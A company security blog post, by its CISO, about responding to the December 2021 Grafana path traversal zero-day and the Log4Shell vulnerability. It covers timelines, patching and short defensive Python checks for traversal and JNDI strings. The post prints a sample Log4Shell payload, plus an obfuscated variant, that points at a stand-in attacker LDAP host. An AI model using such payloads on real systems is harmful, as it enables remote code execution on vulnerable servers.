Aiven Blog

Dec 20, 2021

Security updates: Grafana and Log4j

0day? How about 0december! Aiven's CISO recaps the recent vulnerabilities and what Aiven did about them.

James Arlen

Chief Information Security Officer at Aiven

Dear all,

We’ve already been working through a couple of security issues this month here at Aiven. Like many security teams, we’re feeling a little run down, and we thought you could all use an update on what we’ve been doing about these issues.

Both of these issues represent some of the most interesting but also most painful kinds of security problems that we’ve seen before and will see again. James M. Barrie may have said it best in the quote from the opening narration of the Disney Peter Pan film - “all of this has happened before and it will all happen again”.

The Grafana issue is another case of OWASP Top Ten... input validation. We haven’t seen the end of this variety of issue; turns out that validating input is actually difficult. The log4j issue is one that is even more common - “at the time the functionality was added everyone agreed it was a good idea and no one thought about some kind of a negative interaction with other functionality in a complex code base” combined with the same kind of input validation problem that we saw with Grafana in the same week.

A key message from all security people to all developers should be: “We know that you’re doing difficult things under pressure and you’re going to make mistakes and we’ll work together to make it better”. However, I’m seeing a whole lot of security people pointing fingers at their developer colleagues and making a lot of really negative comments. These problems will happen over and over again. We should be prepared for them and work together to create the best possible outcomes.

Life at Aiven teaches you pretty quickly that Open Source is awesome because of the infinite flexibility of minds working together. It’s also awesome because we’re working together to make a better future for everyone.

Thanks.

Jamie, Aiven’s CISO

Grafana 0day path traversal

Grafana is a popular open source tool for visualizing information. At Aiven, we are happy to offer Aiven for Grafana as one of our open source services, but more importantly, we are also heavy users of Grafana ourselves. We now understand from Grafana’s blog entry that this issue started as a coordinated release event by Grafana and subsequently became publicly available prior to the Grafana team being able to provide the coordination - a 0day.
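For readers less familiar with this class of bug, here is a minimal Python sketch of the kind of containment check that path traversal issues call for. It is a generic illustration only, not Grafana's code and not the fix Aiven developed; the function name `resolve_under` and the directory `/srv/plugins` are hypothetical.

```python
from pathlib import Path


def resolve_under(base_dir: str, user_path: str) -> Path:
    """Resolve user_path inside base_dir, rejecting anything that escapes it."""
    base = Path(base_dir).resolve()
    # Joining and then resolving collapses any ".." segments in user_path.
    # An absolute user_path replaces base entirely and is rejected below.
    candidate = (base / user_path).resolve()
    if candidate != base and base not in candidate.parents:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate


# A well-behaved request stays under the base directory.
print(resolve_under("/srv/plugins", "img/logo.svg"))

# A traversal attempt resolves outside the base directory and is refused.
try:
    resolve_under("/srv/plugins", "../../etc/passwd")
except ValueError as err:
    print("rejected:", err)
```

The point of resolving first and comparing afterwards is that the check is made on the final path, rather than on the raw input string, which is where hand-rolled filters tend to go wrong.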

The issue was reported to the Grafana team on 2021-12-03 02:51 UTC, and they anticipated a public release of the fix by 2021-12-14. Aiven was alerted through a report to our bug bounty program at 2021-12-02 20:56 UTC by the same reporter, and we were already working on developing a fix over the course of the weekend.

We received several bug bounty reports for the same path traversal vulnerability between 2021-12-05 and 2021-12-06 which were marked as duplicates. This indicates that the issue was well known and beginning to circulate among the researcher community.

Our monitoring noted an increase in blind path traversal requests probing for the vulnerability, starting on 2021-12-06 and ramping up sharply on 2021-12-07.
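As a rough idea of what spotting such probes can look like, here is a small Python sketch that flags request paths containing a ".." segment after URL decoding. It is an assumption-laden illustration, not a description of Aiven's monitoring; the function name and the sample paths are made up.

```python
from urllib.parse import unquote


def looks_like_traversal(request_path: str) -> bool:
    """Return True if the decoded path contains a '..' segment."""
    # Decode twice so double-encoded probes such as %252e%252e are caught.
    decoded = unquote(unquote(request_path))
    # Treat backslashes as separators too, since some probes use them.
    segments = decoded.replace("\\", "/").split("/")
    return ".." in segments


# Hypothetical request paths, as they might appear in an access log.
sample_paths = [
    "/public/plugins/example/../../../../etc/passwd",
    "/public/plugins/example/%2e%2e/%2e%2e/etc/passwd",
    "/d/abc123/my-dashboard",
    "/api/health",
]

flagged = [path for path in sample_paths if looks_like_traversal(path)]
for path in flagged:
    print("possible traversal probe:", path)
```

Counting flagged requests per hour is one simple way to see the kind of ramp-up described above, though a real detector would need to handle far more encodings than this sketch does.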

We developed a fix internally that was ready at just about the time that the probe requests started to increase dramatically. The technical operations team declared an incident in order to mitigate any potentially outstanding issues, and the fix was implemented on an accelerated basis.

The vast majority of nodes were patched within a 75-minute window. A few services that were running in the degraded aws-us-east-1 region remained active and carefully monitored for an additional 3 hours while AWS recovered from their incident.

Once the bug bounty reporter was able to confirm our fix to their satisfaction, we paid out the bounty for this high severity bug.

Timeline

2021-12-02 20:56 UTC Bug bounty report received from Jordy

2021-12-03 02:51 UTC (from Grafana’s blog post - their first notification)

2021-12-05 10:25 UTC confirmation of issue and fix in development

2021-12-07 06:04 UTC completed development of the fix

2021-12-07 13:36 UTC testing completed

2021-12-07 13:49 UTC Incident declared

2021-12-07 13:58 UTC change merged into production branch

2021-12-07 17:15 UTC Grafana public GitHub repository has official fix for the vulnerability

2021-12-07 18:30 UTC Aiven starts to apply the patch to customer nodes

2021-12-07 19:42 UTC All Aiven for Grafana services have been patched with the Aiven-developed fix, except a small portion in the aws-us-east-1 region (which is degraded, so new instances cannot be launched)

2021-12-07 22:31 UTC Aiven for Grafana services in the aws-us-east-1 region (which was degraded, so new instances could not be launched) have been patched.

2021-12-10 07:46 UTC Received response from Jordy confirming the fix

2021-12-10 16:00 UTC Paid the bounty for a High severity finding

The big one - Log4j / Log4shell

This is a significant Remote Code Execution (RCE) vulnerability and it’s in… everything! (No, seriously - it’s even in the NASA robot helicopter on Mars, and it caused the NSA to update their tooling!)

This is an important vulnerability because it’s easy to exploit. If your computer runs any Java-based application that uses an unpatched version of log4j, a simple attack like joining a Minecraft chat and receiving a message like "${jndi:ldap://badactor.crime/script}" is enough for potentially malicious code to be loaded and executed. Anything that causes an attacker-controlled message to be logged in Java software via log4j, including chat messages that are routinely logged to disk by popular games like Minecraft, makes the system vulnerable until each of these Java programs updates the version of log4j that it uses. This is going to be a very long-tail vulnerability due to the number of places that log4j is potentially running in your world.
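To make the shape of the attack string concrete, here is a minimal Python sketch that checks text for a plain JNDI lookup like the one quoted above. The function name is hypothetical, and this is an illustration of why string matching is a weak defense, not a mitigation: nested lookups can disguise the same payload, so updating log4j remains the actual fix.

```python
import re

# Matches the literal start of a JNDI lookup, e.g. "${jndi:".
# Case-insensitive matching is a cautious assumption, not a guarantee.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def contains_plain_jndi_lookup(message: str) -> bool:
    """Return True if the message contains an unobfuscated JNDI lookup."""
    return JNDI_LOOKUP.search(message) is not None


chat_message = "${jndi:ldap://badactor.crime/script}"
print(contains_plain_jndi_lookup(chat_message))   # True
print(contains_plain_jndi_lookup("hello, world"))  # False

# A nested lookup hides the same payload from this naive check.
obfuscated = "${${lower:j}ndi:ldap://badactor.crime/script}"
print(contains_plain_jndi_lookup(obfuscated))      # False
```

The last case is the important one: a filter like this misses disguised variants, which is part of why this is expected to be a long-tail vulnerability.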

Aiven was alerted to this issue at 2021-12-10 00:49 UTC and immediately began to investigate the impact of CVE-2021-44228 on Aiven’s internal services and managed customer resources. By 2021-12-10 14:45 UTC, an incident was declared and immediate work began to mitigate and protect against this issue across all customer services and our own infrastructure. All Aiven services were remediated by 2021-12-11 03:46 UTC - a period of about 27 hours from awareness to remediation.
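The intervals between the timestamps above can be checked with a few lines of Python. This is only arithmetic on the times given in this post; the helper name `utc` is ours.

```python
from datetime import datetime, timezone


def utc(timestamp: str) -> datetime:
    """Parse a 'YYYY-MM-DD HH:MM' timestamp as UTC."""
    parsed = datetime.strptime(timestamp, "%Y-%m-%d %H:%M")
    return parsed.replace(tzinfo=timezone.utc)


alerted = utc("2021-12-10 00:49")
declared = utc("2021-12-10 14:45")
remediated = utc("2021-12-11 03:46")

print("awareness to remediation:", remediated - alerted)    # 1 day, 2:57:00
print("incident to remediation: ", remediated - declared)   # 13:01:00
```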

Of all of the production services operated by Aiven for our customers, only Aiven for Elasticsearch and Aiven for OpenSearch were impacted. No other production services were affected.

Aiven for Apache Flink is a beta service not yet fully in production and was deprioritized for remediation. We made the decision to preemptively shut down all instances (unfortunately losing some data) to await business hours patching.

Specific details were published to our customers on the help.aiven.io site and communicated as needed through support ticketing.

As of this posting, Aiven’s internal security team continues to monitor the situation for new exploits or threats. We’re working through our list of supporting vendors and ensuring that they have all taken appropriate action.

Interestingly, this attack vector was actually discussed during a presentation at Black Hat USA 2016 - “A Journey From JNDI/LDAP Manipulation to Remote Code Execution Dream Land” by Alvaro Muñoz and Oleksandr Mirosh, as noted in this tweet. The full impact of that research was not understood until we had the hindsight of this incident to provide context.

Timeline

2021-12-10 00:49 UTC Began internal investigation of CVE-2021-44228, its impact on Aiven internal services, and its impact on managed customer resources

2021-12-10 14:45 UTC Incident declared

2021-12-10 15:28 UTC Began deep dive assessment of exposure and impact, service-by-service

2021-12-10 17:27 UTC Began service-by-service remediation planning

2021-12-10 18:09 UTC Began execution of remediation plan for Aiven for OpenSearch and Aiven for Elasticsearch

2021-12-10 19:07 UTC Disabled the creation of new Aiven for Apache Flink (beta) nodes; all vulnerable Aiven for Apache Flink nodes shut down

2021-12-10 19:36 UTC All necessary production system changes completed, began patching affected customer production nodes

2021-12-10 21:27 UTC Production upgrade completed; OpenSearch, Elasticsearch, and Flink production code patched; began restarting internal services

2021-12-11 02:36 UTC Internal services successfully patched and restarted; began restarting all affected OS/ES customer services

2021-12-11 03:46 UTC ES/OS service restart per cluster completed. All internal services and affected customer nodes successfully patched.

The creation of new services in Flink (beta) is still disabled as of 2021-12-13.

Updates from 2021-12-20

Aiven continues to monitor the evolving situation with the Log4Shell / Log4j vulnerabilities:

Our mitigation for the first and second vulnerabilities is in place across affected systems (Aiven for OpenSearch, Aiven for Elasticsearch, and [beta] Aiven for Apache Flink). The third vulnerability is not exploitable in the context of Aiven services, but we are updating to log4j 2.17 out of an abundance of caution as this set of vulnerabilities continues to expand.

If you have any questions, please reach out to support@aiven.io.

